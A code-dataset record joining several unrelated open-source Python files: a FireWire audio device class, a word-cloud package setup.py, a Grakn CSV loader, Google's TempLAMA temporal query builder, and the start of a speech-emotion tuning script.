self.__node_th.join()\n\n def __enter__(self):\n return self\n\n def __exit__(self, ex_type, ex_value, trace):\n self.release()\n\n def _parse_hardware_info(self):\n hw_info = {}\n\n req = Hinawa.FwReq()\n\n frames = bytearray(4)\n frames = req.transaction(self.get_node(),\n Hinawa.FwTcode.READ_QUADLET_REQUEST, 0xfffff0050000, 4, frames)\n hw_info['asic-type'] = 'FW{0:x}'.format(\n unpack('>H', frames[0:2])[0] >> 4)\n hw_info['firmware-version'] = '{0}.{1}'.format(frames[2], frames[3])\n\n frames = bytearray(4)\n frames = req.transaction(self.get_node(),\n Hinawa.FwTcode.READ_QUADLET_REQUEST, 0xfffff0090020, 4, frames)\n hw_info['asic-id'] = frames.decode('US-ASCII').rstrip('\\0')\n\n return hw_info\n\n def _parse_supported_sampling_rates(self):\n sampling_rates = {}\n playback = []\n capture = []\n # Assume that PCM playback is available for all models.\n for rate in AvcConnection.SAMPLING_RATES:\n if AvcConnection.ask_plug_signal_format(self.fcp, 'input', 0, rate):\n playback.append(rate)\n sleep(0.02)\n # PCM capture is not always available depending on models.\n for rate in AvcConnection.SAMPLING_RATES:\n if AvcConnection.ask_plug_signal_format(self.fcp, 'output', 0, rate):\n capture.append(rate)\n self._playback_only = (len(capture) == 0)\n for rate in AvcConnection.SAMPLING_RATES:\n if rate in playback or rate in capture:\n sampling_rates[rate] = True\n return sampling_rates\n\n def _parse_supported_stream_formats(self):\n supported_stream_formats = {}\n supported_stream_formats['playback'] = \\\n AvcStreamFormatInfo.get_formats(self.fcp, 'input', 0)\n if len(supported_stream_formats['playback']) == 0:\n supported_stream_formats['playback'] = \\\n self._assume_supported_stream_formats('input', 0)\n self._assumed = True\n else:\n self._assumed = False\n if not self._playback_only:\n supported_stream_formats['capture'] = \\\n AvcStreamFormatInfo.get_formats(self.fcp, 'output', 0)\n if len(supported_stream_formats['capture']) == 0:\n supported_stream_formats['capture'] = \\\n self._assume_supported_stream_formats('output', 0)\n return supported_stream_formats\n\n def _assume_supported_stream_formats(self, direction, plug):\n assumed_stream_formats = []\n fmt = AvcStreamFormatInfo.get_format(self.fcp, direction, plug)\n for rate, state in self.supported_sampling_rates.items():\n if state:\n assumed = {\n 'sampling-rate': rate,\n 'rate-control': fmt['rate-control'],\n 'formation': fmt['formation']}\n assumed_stream_formats.append(assumed)\n return assumed_stream_formats\n\n def set_stream_formats(self, playback, capture):\n if playback not in self.supported_stream_formats['playback']:\n raise ValueError('Invalid argument for playback stream format')\n if capture:\n if self._playback_only:\n raise ValueError('This unit is playback only')\n if capture not in self.supported_stream_formats['capture']:\n raise ValueError('Invalid argument for capture stream format')\n if playback['sampling-rate'] != capture['sampling-rate']:\n raise ValueError(\n 'Sampling rate mis-match between playback and capture')\n if self._assumed:\n rate = playback['sampling-rate']\n AvcConnection.set_plug_signal_format(self.fcp, 'output', 0, rate)\n AvcConnection.set_plug_signal_format(self.fcp, 'input', 0, rate)\n else:\n AvcStreamFormatInfo.set_format(self.fcp, 'input', 0, playback)\n if not self._playback_only:\n AvcStreamFormatInfo.set_format(self.fcp, 'output', 0, capture)\n\n def get_current_stream_formats(self):\n playback = AvcStreamFormatInfo.get_format(self.fcp, 'input', 0)\n if not self._playback_only:\n capture 
= AvcStreamFormatInfo.get_format(self.fcp, 'output', 0)\n else:\n capture = None\n return {'playback': playback, 'capture': capture}\n","repo_name":"takaswie/hinawa-utils","sub_path":"hinawa_utils/oxfw/oxfw_unit.py","file_name":"oxfw_unit.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"96"} +{"seq_id":"24797926304","text":"from setuptools import setup\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='d3wordcloud',\n version='0.0.1',\n description='A simple Jupyter (Lab/Notebook) port of Jason Davies d3 JS wordcloud generator https://www.jasondavies.com/wordcloud/',\n py_modules=[\"d3wordcloud\"],\n package_dir={'': 'src'},\n extras_require={\n \"dev\": [\n \"ipython\",\n \"check-manifest\",\n \"twine\"\n ]\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\"\n ],\n python_requires='>=3',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Dominik Weckmüller\",\n author_email=\"dominik@geo.rocks\",\n url=\"https://github.com/do-me/d3wordcloud\"\n)","repo_name":"do-me/d3wordcloud","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"32136197836","text":"# the Python client for Grakn\n# https://github.com/graknlabs/client-python\nfrom grakn.client import GraknClient\n\n# Python's built in module for dealing with .csv files.\n# we will use it read data source files.\n# https://docs.python.org/3/library/csv.html#dialects-and-formatting-parameters\nimport csv\n\n\ndef build_my_graph(inputs, data_path, keyspace_name):\n \"\"\"\n gets the job done:\n 1. creates a Grakn instance\n 2. creates a session to the targeted keyspace\n 3. for each input:\n - a. constructs the full path to the data file\n - b. loads csv to Grakn\n :param input as list of dictionaties: each dictionary contains details required to parse the data\n \"\"\"\n with GraknClient(uri=\"localhost:48555\") as client: # 1\n with client.session(keyspace=keyspace_name) as session: # 2\n for input in inputs:\n input[\"file\"] = input[\"file\"].replace(data_path, \"\") # for testing purposes\n input[\"file\"] = data_path + input[\"file\"] # 3a\n print(\"Loading from [\" + input[\"file\"] + \".csv] into Grakn ...\")\n load_data_into_grakn(input, session) # 3b\n\n\ndef load_data_into_grakn(input, session):\n \"\"\"\n loads the csv data into our Grakn phone_calls keyspace:\n 1. gets the data items as a list of dictionaries\n 2. for each item dictionary\n a. creates a Grakn transaction\n b. constructs the corresponding Graql insert query\n c. runs the query\n d. 
commits the transaction\n :param input as dictionary: contains details required to parse the data\n :param session: off of which a transaction will be created\n \"\"\"\n items = parse_data_to_dictionaries(input) # 1\n\n for item in items: # 2\n with session.transaction().write() as transaction: # a\n graql_insert_query = input[\"template\"](item) # b\n print(\"Executing Graql Query: \" + graql_insert_query)\n transaction.query(graql_insert_query) # c\n transaction.commit() # d\n\n print(\"\\nInserted \" + str(len(items)) +\n \" items from [ \" + input[\"file\"] + \".csv] into Grakn.\\n\")\n\n##\n# Attribute insert definitions\n#\n#\ndef hour_template(hours):\n # insert an hour attribute; the value is a quoted string\n return 'insert $num isa hour; $num \"'+ hours[\"num\"] + '\";'\n\ndef minute_template(mins):\n # insert a minute attribute; the value is a quoted string\n return 'insert $num isa minute; $num \"'+ mins[\"num\"] + '\";'\n\ndef second_template(secs):\n # insert a second attribute; the value is a quoted string\n return 'insert $num isa second; $num \"'+ secs[\"num\"] + '\";'\n\ndef remain_template(remrem):\n # insert a remainder attribute; the value is unquoted (numeric)\n return 'insert $num isa remainder; $num '+ remrem[\"rem\"] + ';'\n\n\n\n##\n# Relationship insert definitions\n\ndef addh_template(addh):\n # match addee\n graql_insert_query = 'match $addee isa hour; $addee \"' + addh[\"addee\"] + '\";'\n # match addor\n graql_insert_query += ' $addor isa hour; $addor \"' + addh[\"addor\"] + '\";'\n # match resnum\n graql_insert_query += ' $resnum isa hour; $resnum \"' + addh[\"resnum\"] + '\";'\n # match remres\n graql_insert_query += ' $remres isa hour; $remres \"' + addh[\"remres\"] + '\";'\n # match remnum\n graql_insert_query += ' $remnum isa remainder; $remnum ' + addh[\"remnum\"] + ';'\n # match remrem\n graql_insert_query += ' $remrem isa remainder; $remrem ' + addh[\"remrem\"] + ';'\n # insert the addition relation\n graql_insert_query += \" insert (addeeh: $addee, addorh: $addor, resulth: $resnum, remresh: $remres, resrem: $remnum, remrem: $remrem) isa addhour;\"\n return graql_insert_query\n \n\ndef addm_template(addm):\n # match addee\n graql_insert_query = 'match $addee isa minute; $addee \"' + addm[\"addee\"] + '\";'\n # match addor\n graql_insert_query += ' $addor isa minute; $addor \"' + addm[\"addor\"] + '\";'\n # match resnum\n graql_insert_query += ' $resnum isa minute; $resnum \"' + addm[\"resnum\"] + '\";'\n # match remres\n graql_insert_query += ' $remres isa minute; $remres \"' + addm[\"remres\"] + '\";'\n # match remnum\n graql_insert_query += ' $remnum isa remainder; $remnum ' + addm[\"remnum\"] + ';'\n # match remrem\n graql_insert_query += ' $remrem isa remainder; $remrem ' + addm[\"remrem\"] + ';'\n # insert the addition relation\n graql_insert_query += \" insert (addeem: $addee, addorm: $addor, resultm: $resnum, remresm: $remres, resrem: $remnum, remrem: $remrem) isa addmin;\"\n return graql_insert_query\n\ndef adds_template(adds):\n # match addee\n graql_insert_query = 'match $addee isa second; $addee \"' + adds[\"addee\"] + '\";'\n # match addor\n graql_insert_query += ' $addor isa second; $addor \"' + adds[\"addor\"] + '\";'\n # match resnum\n graql_insert_query += ' $resnum isa second; $resnum \"' + adds[\"resnum\"] + '\";'\n # match remres\n graql_insert_query += ' $remres isa second; $remres \"' + adds[\"remres\"] + '\";'\n # match remnum\n graql_insert_query += ' $remnum isa remainder; $remnum ' + adds[\"remnum\"] + ';'\n # match remrem\n graql_insert_query += ' $remrem isa remainder; $remrem ' + adds[\"remrem\"] + ';'\n # insert the addition relation\n graql_insert_query += \" insert (addees: $addee, addors: $addor, results: $resnum, remress: $remres, 
resrem: $remnum, remrem: $remrem) isa addsec;\"\n return graql_insert_query\n \n\n\ndef parse_data_to_dictionaries(input):\n \"\"\"\n 1. reads the file through a stream,\n 2. adds the dictionary to the list of items\n :param input.file as string: the path to the data file, minus the format\n :returns items as list of dictionaries: each item representing a data item from the file at input.file\n \"\"\"\n items = []\n with open(input[\"file\"] + \".csv\") as data: # 1\n for row in csv.DictReader(data, skipinitialspace=True):\n item = {key: value for key, value in row.items()}\n items.append(item) # 2\n return items\n\n\nInputs = [\n {\n \"file\": \"numh\",\n \"template\": hour_template\n },\n {\n \"file\": \"numm\",\n \"template\": minute_template\n },\n {\n \"file\": \"nums\",\n \"template\": second_template\n },\n {\n \"file\": \"remain\",\n \"template\": remain_template\n },\n {\n \"file\": \"addh\",\n \"template\": addh_template\n },\n {\n \"file\": \"addm\",\n \"template\": addm_template\n },\n {\n \"file\": \"adds\",\n \"template\": adds_template\n }\n]\n\nif __name__ == \"__main__\":\n build_my_graph(inputs=Inputs, data_path=\"data\\\\\", keyspace_name = \"time_trial\")\n","repo_name":"brettforbes/gTime","sub_path":"2_migrate_csv.py","file_name":"2_migrate_csv.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"} +{"seq_id":"40043272631","text":"import collections\nimport csv\nimport datetime\nimport json\nimport os\nimport random\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport sling\nimport tensorflow as tf\nfrom tqdm import tqdm\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string(\"out_dir\", None, \"Path to store constructed queries.\")\nflags.DEFINE_string(\n \"facts_file\", None,\n \"File containing facts with qualifiers extracted from `sling2facts.py`.\")\nflags.DEFINE_string(\"sling_kb_file\", None, \"SLING file containing wikidata KB.\")\nflags.DEFINE_string(\n \"sling_wiki_mapping_file\", None,\n \"SLING file containing mapping from QID to english wikipedia pages.\")\nflags.DEFINE_integer(\n \"min_year\", 2010,\n \"Starting year to construct queries from. Only facts which have a start / \"\n \"end date after this will be considered.\")\nflags.DEFINE_integer(\"max_year\", 2020,\n \"Ending year to construct queries up till.\")\nflags.DEFINE_integer(\n \"max_subject_per_relation\", 1000,\n \"Maximum number of subjects to retain per relation. 
Subjects are sorted \"\n \"based on popularity before filtering.\")\nflags.DEFINE_float(\"train_frac\", 0.2,\n \"Fraction of queries to hold out for training set.\")\nflags.DEFINE_float(\"val_frac\", 0.1,\n \"Fraction of queries to hold out for validation set.\")\n\nrandom.seed(42)\nY_TOK = \"_X_\"\nWIKI_PRE = \"/wp/en/\"\n\n\ndef _datetup2int(date):\n \"\"\"Convert (year, month, day) to integer representation.\n\n Args:\n date: Tuple of (year, month, day).\n\n Returns:\n an int of year * 1e4 + month * 1e2 + day.\n \"\"\"\n dint = date[0] * 1e4\n dint += date[1] * 1e2 if date[1] else 0\n dint += date[2] if date[2] else 0\n return dint\n\n\ndef date_in_interval(date, start, end):\n \"\"\"Check if date is within start and end.\n\n Args:\n date: Tuple of (year, month, day).\n start: Start date (year, month, day).\n end: End date (year, month, day).\n\n Returns:\n a bool of whether start <= date <= end.\n \"\"\"\n date_int = _datetup2int(date)\n start_int = _datetup2int(start) if start else 0\n end_int = _datetup2int(end) if end else 21000000\n return date_int >= start_int and date_int <= end_int\n\n\ndef parse_date(date_str):\n \"\"\"Try to parse date from string.\n\n Args:\n date_str: String representation of the date.\n\n Returns:\n date: Tuple of (year, month, day).\n \"\"\"\n date = None\n try:\n if len(date_str) == 4:\n date_obj = datetime.datetime.strptime(date_str, \"%Y\")\n date = (date_obj.year, None, None)\n elif len(date_str) == 6:\n date_obj = datetime.datetime.strptime(date_str, \"%Y%m\")\n date = (date_obj.year, date_obj.month, None)\n elif len(date_str) == 8:\n date_obj = datetime.datetime.strptime(date_str, \"%Y%m%d\")\n date = (date_obj.year, date_obj.month, date_obj.day)\n except ValueError:\n pass\n if date is not None and date[0] > 2100:\n # Likely an error\n date = None\n return date\n\n\ndef load_sling_mappings(sling_kb_file, sling_wiki_mapping_file):\n \"\"\"Loads entity names, number of facts and wiki page titles from SLING.\n\n Args:\n sling_kb_file: kb.sling file generated from SLING wikidata processor.\n sling_wiki_mapping_file: mapping.sling file generated from SLING 'en'\n wikipedia processor.\n\n Returns:\n qid_names: dict mapping wikidata QIDs to canonical names.\n qid_mapping: dict mapping wikidata QIDs to wikipedia page titles.\n qid_numfacts: dict mapping wikidata QIDs to number of facts.\n \"\"\"\n # Load QID names.\n logging.info(\"Extracting entity names and num-facts from SLING KB.\")\n commons = sling.Store()\n commons.load(sling_kb_file)\n commons.freeze()\n qid_names = {}\n qid_numfacts = {}\n total = 0\n for f in commons:\n total += 1\n if \"name\" in f:\n if isinstance(f.name, sling.String):\n qid_names[f.id] = f.name.text()\n elif isinstance(f.name, bytes):\n qid_names[f.id] = f.name.decode(\"utf-8\", errors=\"ignore\")\n elif isinstance(f.name, str):\n qid_names[f.id] = f.name\n else:\n logging.warn(\"Could not read name of type %r\", type(f.name))\n ln = len(f)\n qid_numfacts[f.id] = ln\n logging.info(\"Processed %d QIDs out of %d\", len(qid_names), total)\n # Load QID mapping.\n logging.info(\"Extracting entity mapping to Wikipedia from SLING.\")\n commons = sling.Store()\n commons.load(sling_wiki_mapping_file)\n commons.freeze()\n qid_mapping = {}\n for f in commons:\n try:\n if \"/w/item/qid\" in f:\n pg = f.id[len(WIKI_PRE):] if f.id.startswith(WIKI_PRE) else f.id\n qid_mapping[f[\"/w/item/qid\"].id] = pg\n except UnicodeDecodeError:\n continue\n logging.info(\"Extracted %d mappings\", len(qid_mapping))\n return qid_names, qid_mapping, 
\n\n\ndef date_in_interval(date, start, end):\n  \"\"\"Check if date is within start and end.\n\n  Args:\n    date: Tuple of (year, month, day).\n    start: Start date (year, month, day).\n    end: End date (year, month, day).\n\n  Returns:\n    a bool of whether start <= date <= end.\n  \"\"\"\n  date_int = _datetup2int(date)\n  start_int = _datetup2int(start) if start else 0\n  end_int = _datetup2int(end) if end else 21000000\n  return date_int >= start_int and date_int <= end_int\n\n\ndef parse_date(date_str):\n  \"\"\"Try to parse date from string.\n\n  Args:\n    date_str: String representation of the date.\n\n  Returns:\n    date: Tuple of (year, month, day).\n  \"\"\"\n  date = None\n  try:\n    if len(date_str) == 4:\n      date_obj = datetime.datetime.strptime(date_str, \"%Y\")\n      date = (date_obj.year, None, None)\n    elif len(date_str) == 6:\n      date_obj = datetime.datetime.strptime(date_str, \"%Y%m\")\n      date = (date_obj.year, date_obj.month, None)\n    elif len(date_str) == 8:\n      date_obj = datetime.datetime.strptime(date_str, \"%Y%m%d\")\n      date = (date_obj.year, date_obj.month, date_obj.day)\n  except ValueError:\n    pass\n  if date is not None and date[0] > 2100:\n    # Likely an error\n    date = None\n  return date\n\n\ndef load_sling_mappings(sling_kb_file, sling_wiki_mapping_file):\n  \"\"\"Loads entity names, number of facts and wiki page titles from SLING.\n\n  Args:\n    sling_kb_file: kb.sling file generated from SLING wikidata processor.\n    sling_wiki_mapping_file: mapping.sling file generated from SLING 'en'\n      wikipedia processor.\n\n  Returns:\n    qid_names: dict mapping wikidata QIDs to canonical names.\n    qid_mapping: dict mapping wikidata QIDs to wikipedia page titles.\n    qid_numfacts: dict mapping wikidata QIDs to number of facts.\n  \"\"\"\n  # Load QID names.\n  logging.info(\"Extracting entity names and num-facts from SLING KB.\")\n  commons = sling.Store()\n  commons.load(sling_kb_file)\n  commons.freeze()\n  qid_names = {}\n  qid_numfacts = {}\n  total = 0\n  for f in commons:\n    total += 1\n    if \"name\" in f:\n      if isinstance(f.name, sling.String):\n        qid_names[f.id] = f.name.text()\n      elif isinstance(f.name, bytes):\n        qid_names[f.id] = f.name.decode(\"utf-8\", errors=\"ignore\")\n      elif isinstance(f.name, str):\n        qid_names[f.id] = f.name\n      else:\n        logging.warning(\"Could not read name of type %r\", type(f.name))\n    ln = len(f)\n    qid_numfacts[f.id] = ln\n  logging.info(\"Processed %d QIDs out of %d\", len(qid_names), total)\n  # Load QID mapping.\n  logging.info(\"Extracting entity mapping to Wikipedia from SLING.\")\n  commons = sling.Store()\n  commons.load(sling_wiki_mapping_file)\n  commons.freeze()\n  qid_mapping = {}\n  for f in commons:\n    try:\n      if \"/w/item/qid\" in f:\n        pg = f.id[len(WIKI_PRE):] if f.id.startswith(WIKI_PRE) else f.id\n        qid_mapping[f[\"/w/item/qid\"].id] = pg\n    except UnicodeDecodeError:\n      continue\n  logging.info(\"Extracted %d mappings\", len(qid_mapping))\n  return qid_names, qid_mapping, qid_numfacts\n\n\ndef read_facts(facts_file, qid_mapping, min_year):\n  \"\"\"Loads facts and filters them using simple criteria.\n\n  Args:\n    facts_file: File containing wikidata facts with qualifiers.\n    qid_mapping: dict mapping wikidata QIDs to wikipedia page titles.\n    min_year: An int. Only facts with a start / end year greater than this will\n      be kept.\n\n  Returns:\n    all_facts: list of tuples, where each tuple is a fact with\n      (relation, subject, object, start, end).\n  \"\"\"\n  logging.info(\"Reading facts from %s\", facts_file)\n  all_facts = []\n  with tf.io.gfile.GFile(facts_file) as f:\n    for line in tqdm(f):\n      fact = line.strip().split(\"\\t\")\n      # Skip boring properties.\n      if not fact[0].startswith(\"P\"):\n        continue\n      # Skip instance of facts.\n      if fact[0] == \"P31\":\n        continue\n      # Skip facts where object is not an entity.\n      if not fact[2].startswith(\"Q\"):\n        continue\n      # Skip facts whose subject and objects are not wiki pages.\n      if fact[1] not in qid_mapping or fact[2] not in qid_mapping:\n        continue\n      # Get date qualifiers.\n      start, end = None, None\n      for qual in fact[3:]:\n        if not qual:\n          continue\n        elems = qual.split(\"=\")\n        # Skip inherited qualifier.\n        if elems[0].endswith(\"*\"):\n          continue\n        if len(elems) != 2:\n          continue\n        if elems[0].startswith(\"P580\"):\n          start = parse_date(elems[1])\n        elif elems[0].startswith(\"P582\"):\n          end = parse_date(elems[1])\n      if start is None and end is None:\n        continue\n      # Skip facts whose start and end are both before min_year.\n      if ((start is None or start[0] < min_year) and\n          (end is None or end[0] < min_year)):\n        continue\n      all_facts.append(fact[:3] + [start, end])\n  logging.info(\"Loaded total %d facts\", len(all_facts))\n  return all_facts\n\n\ndef read_templates():\n  \"\"\"Loads relation-specific templates from `templates.csv`.\n\n  Returns:\n    a dict mapping relation IDs to string templates.\n  \"\"\"\n  my_path = os.path.dirname(os.path.realpath(__file__))\n  template_file = os.path.join(my_path, \"templates.csv\")\n  logging.info(\"Reading templates from %s\", template_file)\n  reader = csv.reader(tf.io.gfile.GFile(template_file))\n  headers = next(reader, None)\n  data = collections.defaultdict(list)\n  for row in reader:\n    for h, v in zip(headers, row):\n      data[h].append(v)\n  templates = dict(zip(data[\"Wikidata ID\"], data[\"Template\"]))\n  logging.info(\"\\n\".join(\"%s: %s\" % (k, v) for k, v in templates.items()))\n  return templates\n\n\ndef resolve_objects(facts):\n  \"\"\"Combine consecutive objects across years into one fact.\n\n  Args:\n    facts: A list of fact tuples.\n\n  Returns:\n    a list of fact tuples with consecutive facts with the same object merged.\n  \"\"\"\n\n  def _datekey(fact):\n    start = _datetup2int(fact[3]) if fact[3] else 0\n    end = _datetup2int(fact[4]) if fact[4] else 21000000\n    return (start, end)\n\n  # First sort by start time and then by end time.\n  sorted_facts = sorted(facts, key=_datekey)\n  # Merge repeated objects into one.\n  out_facts = [sorted_facts[0]]\n  for fact in sorted_facts[1:]:\n    if (fact[2] == out_facts[-1][2] and fact[3] != fact[4] and\n        out_facts[-1][3] != out_facts[-1][4]):\n      out_facts[-1][4] = fact[4]\n    else:\n      out_facts.append(fact)\n  return out_facts\n\n\ndef _map_years_to_objects(facts, qid_numfacts, min_year, max_year):\n  \"\"\"Map each year between min, max to the corresponding object in facts.\n\n  Args:\n    facts: a list of facts with the same subject and relation.\n    qid_numfacts: a dict mapping wikidata QIDs to number of facts.\n    min_year: an int, starting year to map.\n
    max_year: an int, ending year to map.\n\n  Returns:\n    year2obj: a dict mapping each year between (min_year, max_year) to the\n      corresponding most 'popular' object for that year.\n  \"\"\"\n  year2obj = {}\n  numfacts = lambda x: qid_numfacts.get(x, 0)\n  for f in facts:\n    min_ = f[3][0] if f[3] is not None else min_year\n    max_ = f[4][0] if f[4] is not None else max_year\n    min_ = max(min_, min_year)\n    max_ = min(max_, max_year)\n    for yr in range(min_, max_ + 1):\n      if yr in year2obj:\n        # Keep the more popular object.\n        if numfacts(year2obj[yr]) < numfacts(f[2]):\n          year2obj[yr] = f[2]\n      else:\n        year2obj[yr] = f[2]\n  return year2obj\n\n\ndef _build_example(query):\n  \"\"\"Creates a tf.Example for prediction with T5 from the input query.\n\n  Args:\n    query: a dict mapping query features to their values.\n\n  Returns:\n    a tf.train.Example consisting of the query features.\n  \"\"\"\n  # Inputs and targets.\n  inp = query[\"query\"].encode(\"utf-8\")\n  trg = query[\"answer\"][\"name\"].encode(\"utf-8\")\n  # Metadata.\n  id_ = query[\"id\"].encode(\"utf-8\")\n  recent = query[\"most_recent_answer\"][\"name\"].encode(\"utf-8\")\n  frequent = query[\"most_frequent_answer\"][\"name\"].encode(\"utf-8\")\n  rel = query[\"relation\"].encode(\"utf-8\")\n  # Construct TFRecord.\n  feature = {\n      \"id\":\n          tf.train.Feature(bytes_list=tf.train.BytesList(value=[id_])),\n      \"date\":\n          tf.train.Feature(\n              int64_list=tf.train.Int64List(value=[int(query[\"date\"])])),\n      \"relation\":\n          tf.train.Feature(bytes_list=tf.train.BytesList(value=[rel])),\n      \"query\":\n          tf.train.Feature(bytes_list=tf.train.BytesList(value=[inp])),\n      \"answer\":\n          tf.train.Feature(bytes_list=tf.train.BytesList(value=[trg])),\n      \"most_frequent_answer\":\n          tf.train.Feature(bytes_list=tf.train.BytesList(value=[frequent])),\n      \"most_recent_answer\":\n          tf.train.Feature(bytes_list=tf.train.BytesList(value=[recent])),\n  }\n  return tf.train.Example(features=tf.train.Features(feature=feature))\n\n\ndef create_queries(out_dir, all_facts, templates, qid_names, qid_numfacts,\n                   min_year, max_year, train_frac, val_frac,\n                   max_subject_per_relation):\n  \"\"\"Construct queries for most popular subjects for each relation.\n\n  Args:\n    out_dir: Path to store all queries as well as yearly slices.\n    all_facts: a list of facts.\n    templates: a dict mapping relation IDs to templates.\n    qid_names: dict mapping wikidata QIDs to canonical names.\n    qid_numfacts: dict mapping wikidata QIDs to number of facts.\n    min_year: an int, starting year to map.\n    max_year: an int, ending year to map.\n    train_frac: a float, fraction of subjects to reserve for the train set.\n    val_frac: a float, fraction of subjects to reserve for the val set.\n    max_subject_per_relation: number of subjects to keep per relation.\n  \"\"\"\n\n  def _create_entity_obj(qid):\n    return {\"wikidata_id\": qid, \"name\": qid_names[qid]}\n\n  def _create_implicit_query(subj, tmpl):\n    return tmpl.replace(\"<subject>\", qid_names[subj]).replace(\"<object>\", Y_TOK)\n\n  def _most_frequent_answer(year2obj):\n    counts = collections.defaultdict(int)\n    for _, obj in year2obj.items():\n      counts[obj] += 1\n    return max(counts.items(), key=lambda x: x[1])[0]\n\n  def _most_recent_answer(yr2obj):\n    recent = max(yr2obj.keys())\n    return yr2obj[recent]\n\n  # Group by relation, then by subject.\n  logging.info(\"Keeping only facts with templates.\")\n  rel2subj = {}\n  for fact in tqdm(all_facts):\n    if fact[0] not in templates:\n      continue\n    if fact[0] not in rel2subj:\n      rel2subj[fact[0]] = {}\n    if fact[1] not in rel2subj[fact[0]]:\n      rel2subj[fact[0]][fact[1]] = []\n    
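# file the fact under its (relation, subject) bucket\n    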
rel2subj[fact[0]][fact[1]].append(fact)\n\n logging.info(\"Sorting subjects by 'popularity' resolving multiple objects.\")\n sorted_rel2subj = {}\n for relation in rel2subj:\n sorted_subjs = sorted(\n rel2subj[relation].keys(),\n key=lambda x: qid_numfacts.get(x, 0),\n reverse=True)\n sorted_rel2subj[relation] = [\n (s, resolve_objects(rel2subj[relation][s])) for s in sorted_subjs\n ]\n\n logging.info(\"Keep only subjects with multiple objects.\")\n total_facts = 0\n filt_rel2subj = {}\n for rel, subj2facts in sorted_rel2subj.items():\n filt_subj2facts = list(filter(lambda x: len(x[1]) > 1, subj2facts))\n if filt_subj2facts:\n filt_rel2subj[rel] = filt_subj2facts\n total_facts += sum([len(f) for _, f in filt_rel2subj[rel]])\n logging.info(\"# facts after filtering = %d\", total_facts)\n\n logging.info(\"Keep only %d subjects per relation, split into train/val/test\",\n max_subject_per_relation)\n train_queries, val_queries, test_queries = [], [], []\n tot_queries, tot_subj = 0, 0\n for relation, subj2facts in filt_rel2subj.items():\n num_subj = 0\n for subj, facts in subj2facts:\n year2obj = _map_years_to_objects(facts, qid_numfacts, min_year, max_year)\n p = random.random() # to decide which split this subject belongs to.\n for yr, obj in year2obj.items():\n query = {\n \"query\":\n _create_implicit_query(subj, templates[relation]),\n \"answer\":\n _create_entity_obj(obj),\n \"date\":\n str(yr),\n \"id\":\n subj + \"_\" + relation + \"_\" + str(yr),\n \"most_frequent_answer\":\n _create_entity_obj(_most_frequent_answer(year2obj)),\n \"most_recent_answer\":\n _create_entity_obj(_most_recent_answer(year2obj)),\n \"relation\":\n relation,\n }\n if p < train_frac:\n train_queries.append(query)\n elif p < train_frac + val_frac:\n val_queries.append(query)\n else:\n test_queries.append(query)\n tot_queries += 1\n num_subj += 1\n if num_subj == max_subject_per_relation:\n break\n logging.info(\"%s: # subjects = %d # train = %d # val = %d # test = %d\",\n relation, len(subj2facts), len(train_queries),\n len(val_queries), len(test_queries))\n tot_subj += num_subj\n\n # Save all queries as a json.\n split2qrys = {\n \"train\": train_queries,\n \"val\": val_queries,\n \"test\": test_queries\n }\n tf.io.gfile.makedirs(out_dir)\n logging.info(\"Saving all queries to %s\", out_dir)\n for split in [\"train\", \"val\", \"test\"]:\n with tf.io.gfile.GFile(os.path.join(out_dir, f\"{split}.jsonl\"), \"w\") as f:\n for qry in split2qrys[split]:\n f.write(json.dumps(qry) + \"\\n\")\n\n # Make subdirectories and store each split.\n for year in range(min_year, max_year + 1):\n subd = os.path.join(out_dir, \"yearly\", str(year))\n tf.io.gfile.makedirs(subd)\n logging.info(\"Saving queries for %d to %s\", year, subd)\n counts = collections.defaultdict(int)\n for split in [\"train\", \"val\", \"test\"]:\n with tf.io.TFRecordWriter(os.path.join(subd, f\"{split}.tf_record\")) as f:\n for qry in split2qrys[split]:\n if qry[\"date\"] == str(year):\n f.write(_build_example(qry).SerializeToString())\n counts[split] += 1\n\n\ndef main(_):\n # Load relation templates.\n templates = read_templates()\n\n # Load entity names, number of facts and wiki page titles from SLING.\n qid_names, qid_mapping, qid_numfacts = load_sling_mappings(\n FLAGS.sling_kb_file, FLAGS.sling_wiki_mapping_file)\n\n # Load facts with qualifiers.\n all_facts = read_facts(FLAGS.facts_file, qid_mapping, FLAGS.min_year)\n\n # Create queries.\n create_queries(FLAGS.out_dir, all_facts, templates, qid_names, qid_numfacts,\n FLAGS.min_year, FLAGS.max_year, 
FLAGS.train_frac,\n FLAGS.val_frac, FLAGS.max_subject_per_relation)\n\n\nif __name__ == \"__main__\":\n app.run(main)\n","repo_name":"google-research/language","sub_path":"language/templama/templama.py","file_name":"templama.py","file_ext":"py","file_size_in_byte":16150,"program_lang":"python","lang":"en","doc_type":"code","stars":1525,"dataset":"github-code","pt":"95"} +{"seq_id":"5174333241","text":"import numpy as np\nimport argparse\n\nfrom speech_emotion_recognition.train import train\nfrom speech_emotion_recognition.config import LinguisticConfig, AcousticSpectrogramConfig, AcousticLLDConfig\nfrom speech_emotion_recognition.data_loader import load_acoustic_features_dataset, load_linguistic_dataset, load_spectrogram_dataset\nfrom speech_emotion_recognition.models import AttentionLSTM as RNN, CNN\nfrom speech_emotion_recognition.utils import set_default_tensor\nfrom speech_emotion_recognition.batch_iterator import BatchIterator\n\nNUM_ITERATIONS = 500\n\nLINGUISTIC_TUNING = True\n\nif __name__ == \"__main__\":\n for i in range(NUM_ITERATIONS):\n params = {}\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", \"--model_type\", type=str, default=\"linguistic\")\n args = parser.parse_args()\n\n set_default_tensor()\n\n if args.model_type == \"linguistic\":\n test_features, test_labels, val_features, val_labels, train_features, train_labels = load_linguistic_dataset()\n params[\"hidden_dim\"] = np.random.randint(50, 500)\n params[\"dropout\"] = 0.5 + np.random.rand() * 0.4\n params[\"dropout2\"] = 